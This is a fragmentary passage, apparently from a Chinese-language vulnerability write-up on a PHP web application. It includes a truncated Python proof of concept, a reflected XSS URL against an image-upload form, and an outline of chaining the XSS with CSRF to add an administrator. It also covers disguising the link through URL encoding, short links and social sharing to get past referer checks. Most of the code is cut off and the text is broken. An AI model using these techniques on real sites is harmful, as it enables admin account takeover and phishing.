php:
if(@$step==3){
$token = md5(uniqid(rand(), true));
$_SESSION['token']= $token;
所以如果直接提交安装的参数会不能安装...所以综上,利用POC如下:
# coding=utf-8
import requests
import cgi
from bs4 import BeautifulSoup
s = requests.Session...noshuiyin="/>
http://localhost/uploadimg_form.php?...noshuiyin="/>xss xss
反射型的XSS一般危险性是低,但一旦它和SCRF结合,就会产生美妙的效果:
先到后台试一试添加管理员...72%69%70%74%3e
或者短连接:
或者最后再来一个分享到微博:
这个链接美滋滋~~
可能有人问为何要将这个链接给加密而不直接给自己搭建的钓鱼地址加密,原因就在于referer验证了,有的